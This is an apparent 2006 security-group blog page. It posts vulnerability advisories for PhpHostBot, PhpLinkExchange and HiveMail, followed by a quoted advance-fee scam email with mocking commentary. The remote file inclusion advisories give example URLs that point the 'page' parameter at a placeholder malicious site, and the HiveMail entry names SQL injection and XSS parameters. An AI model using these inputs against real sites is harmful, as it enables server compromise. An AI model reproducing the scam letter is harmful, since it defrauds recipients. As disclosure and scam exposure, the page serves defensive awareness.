by r0t,der4444,cembo,VietMafia

Thursday, July 20, 2006

PhpHostBot remote File Inclusion Vuln.

###############################################
Vuln. discovered by : r0t
Date: 20 july 2006
vendor:www.idevspot.com/PhpHostBot.php
affected versions:PhpHostBot 1.0 / AutoHost 3.0
###############################################

Vulnerability Description:

PhpHostBot contains a flaw that allows a remote file inclusion,which can be exploited by malicious people to compromise a vulnerable system.
User input passed to the "page" parameter in "order/index.php" isn't properly verified before being used to include files. This can be exploited to include scripts from external resources by passing an URL to a remote site.

example:

http://[victim]/order/index.php?page=http://[malicious_site]/file

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

PhpLinkExchange remote File Inclusion Vuln.

###############################################
Vuln. discovered by : r0t
Date: 20 july 2006
vendor:www.idevspot.com/PhpLinkExchange.php
affected versions: 1.0 and prior
###############################################

Vulnerability Description:

PhpLinkExchange contains a flaw that allows a remote file inclusion,which can be exploited by malicious people to compromise a vulnerable system.
User input passed to the "page" parameter in "index.php" isn't properly verified before being used to include files. This can be exploited to include scripts from external resources by passing an URL to a remote site.

example:

http://[victim]/index.php?page=http://[malicious_site]/file

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Tuesday, July 11, 2006

HiveMail vuln.

###############################################
Vuln. discovered by : r0t
Date: 11 july 2006
vendor:http://hivemail.com/
affected versions:
tested on 1.3 and 1.2 versions
other versions also can be affected.
###############################################

Vuln. Description:

1.
HiveMail contains a flaw that allows a remote sql injection attacks.Input passed to the "fields[]" parameter in "search.results.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

2.
HiveMail contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "email","cond","name" parameters in "addressbook.view.php" and input passed to the "daysprune" parameter in "index.php" and input passed to the "data[to]" parameter in "compose.email.php" and input passed to the "markas" parameter in "read.markas.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

3.
It is also possible to disclose the full path to "search.results.php" by defining "searchdate" and "folderids" parameters.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Saturday, July 01, 2006

Scamming


Title:Please, I need to hear from you now

From:Dr. James Ransome
at:30. Juni 2006 09:06

Barclays Bank Plc
London, United Kingdom
I am Dr. James Ransome , Senior Credit Officer, Barclays Bank Plc London. I am writing following an opportunity in my office that will be of immense benefit to both of us.
In my department we discovered an abandoned sum of £12.5million British Pounds Sterling (Twelve Million Five Hundred Thousand British Pounds Sterling) in an account that belongs to one of our foreign customers Late Mr. Morris Thompson an American who unfortunately lost his life in the plane crash of Alaska Airlines
Flight 261, which crashed on January 31 2000, including his wife and only daughter. You shall read more about the crash on visiting this website.

Since we got information about his death, we have been expecting his next of kin or relatives to come over and claim his money because the Bank cannot release the funds unless somebody applies for it as next of kin or relation to the deceased as indicated in our banking guidelines.
Unfortunately I learnt that his supposed next of kin being his only daughter died along with him in the plane crash leaving nobody with the knowledge of this fund behind for the claim. It is therefore upon this discovery that I and two other officials in this department now decided to do business with you and release the money to you as the next of kin or beneficiary of the funds for safe keeping and subsequent disbursement since nobody is coming for it and we don't want this money to go back into Government treasury as unclaimed bill.
We agreed that 20% of this money would be for you as foreign partner, while the balance will be for my colleagues and I. We will visit your country for the disbursement according to the percentages indicated above once this money gets into your account. Please be honest to me as trust is our watchword in this transaction.
Note that this transaction is confidential and risk free. As soon as you receive this mail you should contact me by return mail whether or not you are willing to enter into this deal. In the event you are not interested, I sincerely ask that you disregard this email and tell no one about it. I am very careful on truncating my banking career should you mention this to someone else. I hope you can be trusted in this regard.
Please note that all necessary arrangement for the smooth release of these funds to you has been finalized. We will discuss much in details when I do receive your response.
Please in your response include your telephone and fax numbers for a better communication between us.
You can reach me on the email below
Best regards
James Ransome
Email: jamesransome20067@zonai.com




He he, first at all If some person will say that he works for some company, thats means thathe also will use that company´s email and not from "zonai.com"
But thats also not a point ,with emails there is alot of tricks how to survive .

Next point is how like in this example Brclays bank manager have my email?
Let me answer , my email you will become with spammers software like Mail grabber.

OK. that we everybody now, that money is stollen not from dead American person , but for normal live costumers from some ecommerce site on net or using some poor IE exploits to get they trojan on victims maschine.

For me is intrestnig, that point... if you will say that you had belived to those gangsters and they used your bank account for they illegal money transfers, than you are not guilty.

But lets say, that you belived to those gangsters , but you was to greedy to be happy with they offered 20% and you taked all money.

In both ways you will get in contact with your country law instances.

And guess wich way is better ?

Third one?

 
Copyright (c) 2006 Pridels Sec Crew